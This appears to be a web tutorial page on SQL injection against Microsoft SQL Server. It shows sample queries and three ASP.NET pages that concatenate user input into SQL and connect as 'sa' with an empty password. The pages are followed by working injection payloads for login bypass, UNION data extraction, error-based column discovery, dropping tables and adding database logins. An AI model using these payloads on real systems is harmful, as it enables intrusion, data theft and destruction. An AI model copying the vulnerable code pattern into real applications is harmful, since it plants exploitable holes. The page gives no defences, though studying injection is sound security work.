^{SQL Injection}

 

create table names ( uname char(10) , pwd char(10) , dummy integer)

select * from master..sysmessages

select * from sysobjects -- fro northwind

select * from sysdatabases

select * from syscolumns

select * from syslogins

 

prodid  Amt

P1        10

P2        20

P3        30

P1        1

P2        2

P3        3

P4        4

P5        5

P6        6

P1        1

P2        2

P3        3

P4        10

P5        11

P6        12

 

select prodid,sum(amt) from prod group by prodid

P1        12

P2        24

P3        36

P4        14

P5        16

P6        18

 

select prodid,sum(amt) from prod group by prodid having sum(amt) >= 20

P2        24

P3        36

 

create  PROCEDURE vijay

AS

SELECT * FROM Products P

 

create  PROCEDURE vijay2 @CustomerID nchar(10)

AS

SELECT * FROM customers where customerid = @CustomerID

 

exec vijay2 'ANTON'

 

 

create  PROCEDURE vijay4

AS

SELECT * FROM customers

SELECT * FROM products

 

exec vijay4

-------------------------------------------------------------------------

<%@ page language="C#" %>

<%@ import Namespace="System.Data" %>

<%@ import Namespace="System.Data.SqlClient" %>

<script language="C#" runat="Server">

void abc(Object o, EventArgs e)

{

SqlConnection s = new SqlConnection("UID=sa;pwd=;Initial Catalog=Northwind;Data Source=localhost");

s.Open();

string username = Request.QueryString["uname"];

string password = Request.QueryString["passwd"];

string s1 = "select * from names where uname='" + username + "' and pwd='" + password + "'";

Response.Write(s1 + "<p>");

SqlDataAdapter a = new SqlDataAdapter( s1 , s);

DataSet ds = new DataSet();

int i = a.Fill(ds,"zzz");

Response.Write("No of records is " + i.ToString());

}

</script>

<form runat="Server" action="a.aspx" method="get">

Name:

<input type=text name=uname >

<p>Password:

<input type=text name=passwd>

<p>

<asp:Button Text="Validate" runat="server" OnClick="abc" />

</form>

 

 

1) vijay' --

 

2) ' or 1=1 --

 

3) ' or 1=1; drop table zzz --

 

4)

a) ' or uname  like '%

b) ' or pwd like '%

 

5)

select * from names where uname='' union select * from names --' and pwd=''

' union select * from names --

 

6)

' having 1= 1 --

Exception Details: System.Data.SqlClient.SqlException: Column 'names.uname' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause

 

' group by names.uname having 1= 1 --

Exception Details: System.Data.SqlClient.SqlException: Column 'names.pwd' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

 

' group by names.uname,names.pwd  having 1= 1 --

no error

 

' union select sum(uname) from names --

The sum or average aggregate operation cannot take a char data type as an argument

 

' union select sum(dummy) from names --

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists

 

 

--------------------------------------------------

<%@ page language="C#" %>

<%@ import Namespace="System.Data" %>

<%@ import Namespace="System.Data.SqlClient" %>

<script language="C#" runat="Server">

void abc(Object o, EventArgs e)

{

SqlConnection s = new SqlConnection("UID=sa;pwd=;Initial Catalog=Northwind;Data Source=localhost");

s.Open();

string f1 = Request.QueryString["uname"];

string f2 = Request.QueryString["passwd"];

string s1 = "insert into names values ('" + f1 + "','" + f2 + "')";

Response.Write(s1 + "<p>");

SqlCommand c = new SqlCommand(s1,s);

c.ExecuteNonQuery();

}

</script>

<form runat="Server" action="a.aspx" method="get">

Name:

<input type=text name=uname >

<p>Password:

<input type=text name=passwd>

<p>

<asp:Button Text="Validate" runat="server" OnClick="abc" />

</form>

 

1)

For field password

')  ; drop table zzz ; --

 

2)

For field password

')  ; exec master.dbo.sp_addlogin 'ted1' --

 

---------------------------------------------------------------------------------

 

<%@ page language="C#" %>

<%@ import Namespace="System.Data" %>

<%@ import Namespace="System.Data.SqlClient" %>

<script language="C#" runat="Server">

void abc(Object o, EventArgs e)

{

SqlConnection s = new SqlConnection("UID=sa;pwd=;Initial Catalog=Northwind;Data Source=localhost");

s.Open();

string cname = Request.QueryString["cname"];

string s1 = "select * from customers where customerid = '" + cname + "'";

Response.Write(s1 + "<p>");

SqlDataAdapter a = new SqlDataAdapter( s1 , s);

DataSet ds = new DataSet();

int i = a.Fill(ds,"zzz");

d.DataSource = ds.Tables["zzz"].DefaultView;

d.DataBind();

}

</script>

<form runat="Server" action="a.aspx" method="get">

Customer Name:

<input type=text name=cname >

<p>

<asp:Button Text="Fetch" runat="server" OnClick="abc" />

<p>

<asp:DataGrid id="d" runat="server"/>

</form>

 

' or 1=1 --

----------------------------

 

Back to the main page